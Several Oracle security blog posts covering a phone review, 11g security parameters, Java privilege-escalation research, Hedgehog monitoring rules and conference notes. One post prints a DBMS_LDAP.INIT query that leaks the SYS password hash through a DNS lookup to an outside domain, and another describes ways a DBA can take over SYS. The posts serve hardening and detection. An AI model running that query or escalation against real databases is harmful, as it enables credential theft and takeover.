Three Tier Oracle Security in London ~ Paul M. Wright

ORACLE SECURITY AND COMPUTER FORENSICS


Oracle and Google Nexus

Hi All,

Nice paper from Pete on Sentrigo Hedgehog usage which also references the Java vulnerability work by David.

I noticed that David’s 11g presentation is up at YouTube http://www.youtube.com/watch?v=IZq3D2pvyNE ~ I have already seen the vulnerability being adapted to provide other CREATE SESSION to DBA escalations not yet published… this research is opening the door to a lot of other Oracle/Java vulnerabilities.
But all is not bad for Oracle on YouTube as the Sun Solaris Security team have an interesting video entitled “Protecting Oracle” which includes information on the new “ORACLE” role (not group) within Solaris 10. http://www.youtube.com/watch?v=kcuW03_YTTQ Worth checking out IMO. Time to reinstall my http://www.opensolaris.com box.
YouTube, owned by Google of course, is also hosting a video showing how to search for tnsnames.ora entries on the Web. http://www.youtube.com/watch?v=SuZDmuFYaVY . This is pretty basic Google hacking but a scary wake-up call as well. I recommend carrying out this type of Google search on your own organisation to make sure that you do not come up in the search results. Additionally, don't open Oracle ports to the Internet, as there will always be new research that is ahead of your hardening guide.
Talking of Google I have received my Nexus-One from the States and I am glad to say that it is marvellous.
Standard Micro-USB and SD card with a standard earphone socket, and you can take the back off to replace the battery. This is the IBM PC of the smartphone future IMO, and remembering our DOS history lesson tells us that the hardware is not as important as the software... so here is a quick summary of my experience with the Eclair 2.1 Android OS.
When first connected it installs an update from Google and connects Gmail, Google Docs, Google Maps etc. perfectly.
The voice recognition works reasonably well. Screen is excellent and responsive. There are plenty of apps on http://www.google.com/enterprise/marketplace/home with linkedin and skype etc in pipeline.
The screen keyboard takes a while to get used to but does work effectively. Multitouch works fine. It was tempting to wait for the Desire or Legend but I wanted to have the confidence of connecting to Google through their own device to support their OS. Don't keep anything sensitive in the GCloud, but for normal data that you are prepared to share, this is the bees knees. The bottom screen buttons are a bit jittery at times and the trackball could wear out like on the BlackBerry in a year or two, so I think Google will improve the hardware with their second phone. However there is no need to use the trackball at all as the screen works perfectly well. The main factor is that the phone connects to the GCloud perfectly. The phone also has the usual news, temperature etc. and the map integration is amazing, especially if you are prepared to opt into the location services. Not for everyone all the time, but if you became lost this could be a lifesaver. Oh, nearly forgot... the actual telephone works reliably as well.
I would recommend buying the Nexus-One from google direct. Came in 1.5 days via DHL with the accessories which are high quality and easy to use. Bought the docking bay, spare battery and extra adaptor. Have also ordered a Gel protective case from Amazon. Even though the phones get tested for resiliency, the Nexus is heavy and metallic and will IMO be prone to dropping and cracked screens. Rather than test this theory I am playing safe with a case though the silicon screen covers reportedly make the screen greasy and not as easy to use so not bought any of those.
The HTC Legend and Desire look good but I had to get something now and also prefer to be able to sync closely with Google's services. Take care though, as clear-text confidential work information should not go through Google, and keep an eye on resources like this http://www.google-watch.org/ to see both sides. The Desire and Legend have a better optical trackball, but I have not had to use the trackball at all yet, so if you like the logged-in Google services I think the Nexus is the better option (with a SIM-only plan e.g. Vfone or O2). Given that the UK launch of the Nexus has been put back, ordering direct from the States will be the only option for a while.
Lastly we have to watch out for folks phishing that Google cookie... there have been some Gmail attacks documented by Mike Bailey at Blackhat, among others.
"Cloud" security, for Google phones or shared Oracle infrastructure, is one of the hot subjects for this year for good reason, so keep safe and secure,
Cheers,
Paul

sec_return_server_release_banner Secure by Default?

Hello World,

Congratulations to Sentrigo for being nominated again in the SC Awards in the US for Hedgehog.
http://www.scmagazineus.com/scawards2010-finalists/section/1309/

Just came across an ex-colleague from Pentest Ltd named Simon Fletcher who has started a blog on Oracle Security.
http://blog.fifteentwentyone.co.uk/2010/02/sql92security.html
Nice post and good luck with the new blog. Oracle config issues like these are interesting for already very highly secured environments, though IMO this is icing on the cake currently, as there are still default scott/tigers, open firewall 1521 ports and... even in high security environments... Aurora bugs to fix first. But it is interesting and got me reading about Oracle security configurations in general, which is when I came across this statement at the URL below:
"The default value of sec_return_server_release_banner is TRUE"
http://www.articles.freemegazone.com/oracle-11g-password-features.php?ref=3

Default to secure...? Doesn't sound right... better check this to make sure:

SQL> sho parameter sec_return_server_release_banner;
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
sec_return_server_release_banner boolean FALSE
--
--that looks more like what I was expecting... so..
--
SQL> alter system set sec_return_server_release_banner=TRUE scope=spfile;
System altered.

Then the instance has to be restarted, of course, since the change was made with scope=spfile and only takes effect at the next startup.

Don gets it right with a nice summary of the 11g security parameters here:
http://www.dba-oracle.com/t_11g_new_hacking_prevention.htm

So the article had the default wrong: it is FALSE, as the check above shows. One caveat on what the value means, though: TRUE tells the server to return the complete release banner to unauthenticated clients and FALSE to return only a generic version string, so FALSE, the default, is the restrictive setting and is the one to keep (the ALTER SYSTEM above loosens it). On the positive side the additional secure config params in 11g are an improvement, but these are all still icing on the cake, which is currently sitting on a Java Jelly.
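As an added example that is not part of the original post, here is a query that checks the 11g sec_* parameters against a hardening baseline in one go rather than one sho parameter at a time. It assumes a user with access to V$PARAMETER (SELECT_CATALOG_ROLE is enough). The REQUIRED patterns are this example's choices, not Oracle's; the 11g default for each parameter is noted in the comment alongside it.

```sql
-- Added example, not from the original post: audit the Oracle 11g sec_*
-- parameters against a hardening baseline. Needs SELECT on V$PARAMETER
-- (e.g. SELECT_CATALOG_ROLE). The REQUIRED patterns are this example's
-- choices, not Oracle's; the 11g default for each is noted in its comment.
WITH baseline AS (
  SELECT CAST('sec_return_server_release_banner' AS VARCHAR2(64)) AS name,
         CAST('^FALSE$' AS VARCHAR2(64))                         AS required,
         CAST('FALSE = generic banner only to unauthenticated clients (11g default FALSE)'
              AS VARCHAR2(200))                                  AS note
  FROM   dual UNION ALL
  SELECT 'sec_case_sensitive_logon', '^TRUE$',
         'case-sensitive passwords (11g default TRUE)'
  FROM   dual UNION ALL
  SELECT 'sec_max_failed_login_attempts', '^[1-5]$',
         'drop the connection after a few bad logins (11g default 10)'
  FROM   dual UNION ALL
  SELECT 'sec_protocol_error_further_action', 'DROP|DELAY',
         'penalise malformed TNS packets instead of CONTINUE (11g default CONTINUE)'
  FROM   dual UNION ALL
  SELECT 'sec_protocol_error_trace_action', '^(LOG|ALERT)$',
         'record protocol errors somewhere that is watched (11g default TRACE)'
  FROM   dual
)
SELECT b.name,
       NVL(p.value, '<not present>')                         AS current_value,
       p.isdefault,
       CASE
         WHEN p.value IS NULL                               THEN 'UNKNOWN'
         WHEN REGEXP_LIKE(p.value, b.required, 'i')         THEN 'OK'
         ELSE 'REVIEW'
       END                                                   AS status,
       b.note
FROM   baseline b
       LEFT JOIN v$parameter p ON p.name = b.name
ORDER  BY b.name;
```

Every row reported as REVIEW is a parameter still at a value looser than the baseline; ISDEFAULT shows whether anyone has ever touched it. Run it again after the restart to confirm the spfile change actually took.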

Talking of release banners, Slavik has observed that Oracle sends a RESEND after every connection attempt, perhaps in an attempt to interfere with version identification. Will have a look at this later.
http://www.slaviks-blog.com/2010/03/07/oracle-tns-resend-packet/

I note there is an Oracle Security event in Manchester on the 11th March though check first on the business/technical balance.
http://www.oracle.com/webapps/events/EventsDetail.jsp?p_eventId=103823&src=6808550&src=6808550&Act=23

Have a good week and keep safe and secure.

Cheers,
Paul

E-Business Suite Security and DBMS_LDAP.INIT

Hi Folks,

The vulnerability in E-Business Suite R12 reported below requires the non-default diagnostics mode, so it is low risk.
http://www.securityfocus.com/archive/1/509460
Having said that, it is worth keeping an eye on Internet-facing Oracle applications, though there is not a huge amount published on this by O'Reilly and Apress.
Google books has a relevant book free of charge named “Security, Audit and Control Features Oracle E-Business Suite” http://books.google.co.uk/books?id=JWrCxjgsfHcC&printsec=frontcover#v=onepage&q=&f=false.
The main book for E-Business Suite security is John Abel's, though that is based on 11i of course.
Steven Chan’s blog is a good read for Oracle Apps security as well.

Other recent related reading has included http://www.databasesecurity.com/ExploitingPLSQLinOracle11g.pdf . This paper confirms the importance of firewall egress filtering in Oracle three tier environments. So, for instance, a statement like the one below should be prevented from exfiltrating data through the firewall: it appends the SYS password hash as a subdomain of a domain the attacker controls, so the database server itself resolves and tries to connect to that host name, leaking the hash in the DNS lookup before any LDAP traffic is even needed.

SELECT DBMS_LDAP.INIT((SELECT PASSWORD FROM SYS.USER$ WHERE NAME ='SYS')||'.oraclesecurity.com',80) FROM DUAL;

The executing account only needs SELECT ANY DICTIONARY, because DBMS_LDAP is publicly executable.

SQL> select grantee from all_tab_privs where table_name='DBMS_LDAP';
GRANTEE
------------------------------
PUBLIC

The database server has no business opening outbound connections through the Internet-facing firewall. This statement can be added to the other examples in http://www.red-database-security.com/wp/oracle_cheat_sheet.pdf

So part of the solution to this issue (along with blocking egress) is to:

SQL> conn sys as sysdba
Enter password:
Connected.
SQL> REVOKE EXECUTE ON SYS.DBMS_LDAP FROM PUBLIC;
Revoke succeeded.

But what uses this package under the hood, and is there any software within the DB/application architecture that depends on that PUBLIC execute?... Well, if you have read my latest paper ~ SecuringJavaInOracle ~ you will know that the solution is to write a Hedgehog rule on the SYS.DBMS_LDAP package, monitoring all calls that involve that package, so you can see what actually uses it:

Object='SYS.DBMS_LDAP'

Note that the above rule only triggers when DBMS_LDAP is successfully executed. This rule is good for profiling the use of the package, but to alert to failed attempts to use or exploit the package, HH must alert on the text of the SQL statement as follows:

Statement matches 'DBMS_LDAP'

This second Statement rule will alert even if the executing statement fails, due to lack of the correct privilege for instance. A way to test that this rule works is as follows.

Select 'DBMS_LDAP' from dual;

This will trigger the second rule to alert but not the first.
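As an added example that is not part of the original post (the post's own answer is the Hedgehog profiling rule above), here is the static check a DBA can run before the REVOKE: who holds EXECUTE on DBMS_LDAP, and which stored code references it, so the owners that need a direct grant are known before PUBLIC loses it. It generalises to the other SYS packages that can open outbound connections; that package list is this example's choice, not the post's, and it assumes a DBA or SYS session.

```sql
-- Added example, not from the original post: before revoking PUBLIC execute on
-- SYS.DBMS_LDAP, find out statically who holds EXECUTE on it and which stored
-- code references it, then grant EXECUTE to those owners so the revoke does
-- not break them. Generalised to the other SYS packages that can open outbound
-- connections (this example's list, not the post's). Run as SYS or a DBA.

-- 1. Who can execute the network-capable packages today?
SELECT tp.table_name AS package_name, tp.grantee, tp.grantable
FROM   dba_tab_privs tp
WHERE  tp.owner = 'SYS'
AND    tp.privilege = 'EXECUTE'
AND    tp.table_name IN ('DBMS_LDAP', 'UTL_HTTP', 'UTL_TCP', 'UTL_INADDR', 'UTL_SMTP')
ORDER  BY tp.table_name, tp.grantee;

-- 2. Which stored code outside SYS/SYSTEM references them? These owners need a
--    direct grant once PUBLIC loses it. Dynamic SQL, Java and client-side calls
--    do not show up here, which is why runtime monitoring is still needed.
SELECT d.referenced_name AS package_name,
       d.owner           AS dependent_owner,
       d.name            AS dependent_object,
       d.type            AS dependent_type
FROM   dba_dependencies d
WHERE  d.referenced_owner = 'SYS'
AND    d.referenced_type  = 'PACKAGE'
AND    d.referenced_name IN ('DBMS_LDAP', 'UTL_HTTP', 'UTL_TCP', 'UTL_INADDR', 'UTL_SMTP')
AND    d.owner NOT IN ('SYS', 'SYSTEM')
ORDER  BY d.referenced_name, d.owner, d.name;

-- 3. Generate the compensating grants from step 2. Review them, run them, and
--    only then REVOKE ... FROM PUBLIC, so dependent code does not invalidate.
SELECT DISTINCT 'GRANT EXECUTE ON SYS.' || d.referenced_name
       || ' TO ' || d.owner || ';' AS grant_stmt
FROM   dba_dependencies d
WHERE  d.referenced_owner = 'SYS'
AND    d.referenced_type  = 'PACKAGE'
AND    d.referenced_name IN ('DBMS_LDAP', 'UTL_HTTP', 'UTL_TCP', 'UTL_INADDR', 'UTL_SMTP')
AND    d.owner NOT IN ('SYS', 'SYSTEM')
ORDER  BY 1;

-- 4. 11g only: the network ACLs that gate these packages' outbound connections.
--    A principal with no ACL entry for a host gets ORA-24247 regardless of the
--    EXECUTE grant, so this is a second layer behind the firewall egress rules.
SELECT a.host, a.lower_port, a.upper_port, p.principal, p.privilege, p.is_grant
FROM   dba_network_acls a
       JOIN dba_network_acl_privileges p ON p.acl = a.acl
ORDER  BY a.host, a.lower_port, p.principal;
```

Step 2 only sees references compiled into stored code; anything that reaches DBMS_LDAP through EXECUTE IMMEDIATE, Java or a client tool does not appear, which is exactly the gap the runtime Statement rule above closes. In step 4, an ACL that grants connect on host '*' to PUBLIC hands the egress straight back, so treat that as a finding in its own right.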

Using the above method we can fix security issues with a low risk of affecting the application's functionality. Real-time application monitoring is an important part of the SDLC in mature applications, along with static code analysis and dynamic application testing. More on this at the upcoming ISSD Conference.

Cheers,
Paul

Securing Java in Oracle Update and escalating to SYSDBA

Updated Securing Java in Oracle paper here.

David’s work has drawn attention.
http://www.h-online.com/security/news/item/Vulnerability-in-Oracle-11gR2-allows-system-privileges-for-all-Update-923143.html
http://www.computerworld.com/s/article/9151318/Black_Hat_Zero_day_hack_of_Oracle_11g_database_revealed?taxonomyId=1
etc..
What the reports miss is that this definitely affects 10.2.0.4.3 as well in a big way.

Oracle have provided some guidance in the absence of a patch:

- revoke execute on "oracle/aurora/util/Wrapper" from public;
- grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
- grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
- revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

Of course the problem is knowing the effect that these privilege changes will have before making them. Most organisations either take the risk of the change breaking functionality or decide to stay as they are. What is needed is a low risk method of evaluating the effect of the change before it is made. That is exactly the subject of my updated Securing Java in Oracle paper, which describes using Database Application Monitoring Systems to profile application behaviour prior to applying the fix, so the effect can be predicted, thus lowering risk.

Different subject… I have been interested in the difference between DBA account privileges and SYSDBA account privileges for a while. There are a few listed here http://www.oracleforensics.com/wordpress/index.php/2008/09/16/sysdba-specific-privileges/.
One of the reasons it interests me is that any DBA can gain SYSDBA quite trivially. Not by direct grant and not by shifting the SYSDBA bit in memory, but by simply changing the SYS password via ALTER USER SYS IDENTIFIED BY NEWPASSWORD; which can be done by any DBA user via the ALTER USER system privilege. This makes any DBA escalation a SYSDBA escalation, so why increasingly differentiate their privileges?
There is a safeguard against ALTERing SYS's password, but it can be bypassed by using the GRANT ... IDENTIFIED BY route to change a user's password, as Alex describes: http://blog.red-database-security.com/2010/02/24/how-to-prevent-a-user-granted-the-alter-user-privilege-from-changing-syssystem-password-and-how-to-bypass-it/.

Additionally, by using the Java API in Oracle it is possible to call the OS as the oracle OS user, so commands such as orapwd can be invoked, which allow the SYS password to be changed to a given value! More detail on this at a later date, but suffice it to say that Securing Java in Oracle should be given high priority due to its highly privileged access to the OS from low privileged DB accounts.

I will be presenting on the subject of Securing Java in Oracle both via the SDLC and using DAMS at the ISSD conference in May http://www.issdconference.com/index.php?option=com_content&view=article&id=161. See you there.

Cheers,
Paul

Securing Java In Oracle and DBMS_JVM_EXP_PERMS

David Litchfield’s Java/Oracle security research has been made public by the Blackhat conference in DC before it is patched by Oracle. Additionally there is some misinformation going round that this work only affects 11.2 which is incorrect as it affects 10.2.0.4.3 as well. These vulnerabilities are theoretically easy to fix but since theoretical is not good enough for real world I have written a short paper to explain how to test the fixes before deploying them, along with some analysis about preventing this type of issue in the future. This is in my opinion the most serious research for a long time and needs to be acted on, so hopefully this paper will help solve a few headaches out there.
Cheers,
Paul

Jan 2010 CPU Update

Hello Folks,
So, back in the saddle, and the Jan CPU scores 7.5 (CVSS) for Linux, so it needs to be taken seriously. The PSU containing the CPU installs nicely for 10.2.0.4.3 and gives full detail of the vulnerabilities being fixed while installing... makes interesting reading. The Jan CPU does not fix all the bugs I was expecting it to fix, so there are still some serious vulns in the pipeline.
This is an interesting blog entry that I came across.
http://intevydis.blogspot.com/2010/01/oracle-weblogic-1032-node-manager-fun.html
Congrats to Oracle on the EU merger go-ahead. So Larry has the full stack now. Exciting times ahead for Oracle folks.
More to come and business as usual.
Cheers,
Paul

PUBLIC Regex in the absence of Definer’s Rights Roles

Been ill this week with man flu ~ not bird or swine flu, much more serious than that..

...So back to the plot. In the current absence of Definer's Rights Roles, there is a temptation for devs to GRANT EXECUTE to PUBLIC on their new packages so that the privileges carry through to other schemas' packages (roles are disabled inside definer's rights PL/SQL, so a package can only rely on privileges granted directly to its owner or to PUBLIC). PUBLIC is too wide a grouping, and just because it is the only Definer's Rights Role does not mean that ALL grants should be made to it. This is a bad habit picked up to save working out the actual privileges required.
Therefore it is a good idea to alert to these PUBLIC grants using HH RegEx rules with the MATCHES keyword as below:

statement MATCHES 'to\s*public'

Note that the character literals in the regEx are case insensitive with HH.
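As an added example that is not part of the original post, the same pattern can be exercised in Oracle's own regular expression engine before it goes into a Hedgehog rule, to see what it matches and what it over-matches. The statements in the WITH clause are constructed for the example, and the tighter variant is this example's suggestion, not the post's rule.

```sql
-- Added example, not from the original post: exercise the Hedgehog pattern
-- 'to\s*public' with Oracle's REGEXP_LIKE over constructed statements, so the
-- rule's case-insensitivity, whitespace handling and over-matching can be seen
-- before it goes live. The statements below are made up for this example.
WITH sample_stmts AS (
  SELECT 1 AS id,
         CAST('GRANT EXECUTE ON app.util_pkg TO PUBLIC' AS VARCHAR2(200)) AS stmt
  FROM   dual UNION ALL
  SELECT 2, 'grant select on hr.salaries to   public'                FROM dual UNION ALL
  SELECT 3, 'GRANT EXECUTE ON app.util_pkg TO' || CHR(10) || 'PUBLIC' FROM dual UNION ALL
  SELECT 4, 'GRANT EXECUTE ON app.util_pkg TO PUBLIC_API_ROLE'       FROM dual UNION ALL
  SELECT 5, 'INSERT INTO notes VALUES (''sent to public'')'          FROM dual UNION ALL
  SELECT 6, 'GRANT EXECUTE ON app.util_pkg TO app_reader'            FROM dual
)
SELECT id,
       REPLACE(stmt, CHR(10), '\n')                                  AS stmt,
       -- the rule as written in the post: 'i' makes it case-insensitive,
       -- \s* absorbs any run of whitespace including a newline
       CASE WHEN REGEXP_LIKE(stmt, 'to\s*public', 'i')
            THEN 'ALERT' ELSE '-' END                                 AS hh_rule,
       -- tighter variant (this example's): at least one whitespace character
       -- before PUBLIC and no identifier character after it, so a role that
       -- merely starts with PUBLIC no longer fires
       CASE WHEN REGEXP_LIKE(stmt, 'to\s+public(\W|$)', 'i')
            THEN 'ALERT' ELSE '-' END                                 AS tighter_rule
FROM   sample_stmts
ORDER  BY id;
```

Rows 1 to 3 fire on both patterns, showing the case-insensitive flag and the whitespace handling; row 4 fires only on the post's pattern, since PUBLIC_API_ROLE starts with PUBLIC; row 5 fires on both because, like the post's Select 'DBMS_LDAP' from dual test, a text rule matches a string literal too, which is the price of catching failed attempts; row 6 fires on neither.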

For more in depth RegEx rule writing there is a nice page on Sentrigo’s web site at the URL below, which I recommend reading:
http://www.sentrigo.com/how-to-compose-effective-and-efficient-regular-expressions

Additionally I would like to mention Alex's Anti Hacker class, taking place January 12-14, 2010 in San Francisco, California. https://pages.sentrigo.com/Anti-Hacking.html.
I know Alex has experience of implementing defensive solutions with a number of commercial customers and is at the cutting edge of offensive research as well, which is a powerful combination. The syllabus looks interesting so worth checking out…and maybe taking in the Bay Area and the bridge at the same time.

Cheers,
Paul

UKOUG review

The dust has now settled so let’s see what has survived in the memory banks..
Tom’s presentation was entertaining with an application development security theme. I missed Alex Keh’s talk on AD which was a shame as looking at the slides it was a good talk (download password is at the bottom of the printed paper agenda given in the bags).
Instead I went to Slavik's SQL injection talk and learnt some more ways to extrude data via error messages. Slavik's talk was a good summary of the best of Oracle security research and was well attended. Then to Joel's DBLinks presentation, which was a well thought out, methodical and thorough talk on how DB links behave in distributed and RAC environments. Finally to Pete's Data Security talk, which was good revision and again well attended, with folks meeting up again in the evening for meet the speaker, where I discussed the maximum SCN issue over DBLinks with Joel. The Security Roundtable the next day was a good opportunity to discuss new ideas, among those the notion of Definer Rights Roles (akin to PUBLIC but with the ability to revoke and deny the customisable Definer Rights Role from a user). The PL/SQL speakers did not understand the security importance of this proposed feature when I had mentioned it at "meet the speaker" the night before, but I found "like minds" at the security round table. It was inspiring to talk to people working for Oracle who are still highly motivated to improve the product and prepared to listen to folks outside of Oracle for ideas and user stories. Excellent.
In summary I think the networking aspect was probably the highlight of the conference ~ being able to meet other speakers and discuss ideas with them was great... more to come on some of the technical lessons learnt.

UKOUG Agenda

So UKOUG next week, where I will be attending Monday and Tuesday. There are quite a few Oracle security presentations some of which are listed below. Many of the presentation pdfs have already been posted on UKOUG’s site, so you can print them off before attending if you wish.

Monday
10:45 - 11:45 Hall 1
Server Technology Keynote: What are we still doing wrong?
Thomas Kyte - Oracle
12:05 - 13:05 Hall 10B
Active Directory and Windows Security Integration with Oracle Database
Alex Keh - Oracle
12:05 - 12:50 Hall 6
SQL Injection attacks
Slavik Markovich - Sentrigo
13:40 - 14:40 Hall 9
Oracle Database Links part 2 - Distributed Transactions
Joel Goodman - Oracle
14:50 - 15:35 Hall 10A
The right way to secure data
Pete Finnigan - PeteFinnigan.com
16:00 - 18:00 Hall 11B
Security and Vault Management
David Storey - Oracle
Tuesday
10:35 - 11:35 Hall 1 Foyer Level 5
Oracle Security roundtable
Pete Finnigan - PeteFinnigan.com
Co-presenter: Slavik Markovich - Sentrigo
Paul Wright - Markit
Kevin Else - No Fools
Keith Hutton - Cervello Consultants
12:05 - 13:05 Hall 10A
Securing your web services
Gerard Davison - Oracle
15:00 - 15:45 Hall 9
The murky world of Database Character Sets
Paul Hancock - Lloyds Banking Group
17:05 - 18:05 Hall 5
Oracle Database Security done right
Frits Hoogland - VX Company

See you there..

Cheers,
Paul

PUBLIC ROLE AND DEFINER RIGHTS

Hi All,
I received Applied Oracle Security in the post this weekend from Amazon. Yes they are still selling actual books, as well as offering Amazing Elastic Clouds to the masses.
Being Oracle Press I expected the book to be from the Oracle vendor perspective, but having said that David Knox's previous Oracle Press book was a very good read, so let's start with a positive open mind. The Database Vault chapter looks good, with a fundamentals and an advanced section. DBV is beginning to be taken up, though if a low privilege user can make themselves DBA, and a DBA can make themselves SYSDBA, then the added icing on the cake of DBV should not be relied on in itself. Need to firm up the foundations as well.
There are a couple of nice Apex security chapters though I have not used this software much commercially, I can see its appeal.
The book includes a chapter on Audit Vault, which runs as the Oracle unix user and so is susceptible to escalations that give the ability to tamper with the audit trail mechanism. Sentrigo HH runs as a separate user from Oracle, so this is not an issue for HH. If you are interested in either DBV or Apex then it is worth buying the book. It is not on Safari but can be purchased electronically for Kindle.

My current perspective on Oracle security is that there are a few central basic core improvements that could be made to the Oracle DB to allow more direct access to users securely.
One of these is the issue of how to allocate privileges on PL packages efficiently. If a package is found to be vulnerable then public execute is revoked and privileges to the user that requires it are granted. BUT have a think why public was granted in the first place.
One reason is that it means every user can execute the package, BUT the other is that any other package can also execute the package using its definer rights. Roles are not enabled within DEFINER rights code, that is except for the PUBLIC "ROLE". PUBLIC is the only customisable grouping that is picked up by definer rights, so if a package is granted to PUBLIC then any other package can also execute it. This is interesting in my opinion because what it illustrates is that the reason for so many PUBLIC grants is that PUBLIC is the only role which can pass its privileges via DEFINER rights. So the ability for more precisely defined roles to be effective through definer rights would enable the revocation of more PUBLIC grants, and mean that many would not need to be granted originally. So DEFINER rights Roles please Oracle :)
Of course major changes to the core RDBMS are not easy, but it is good to have a wish list.
Cheers,
Paul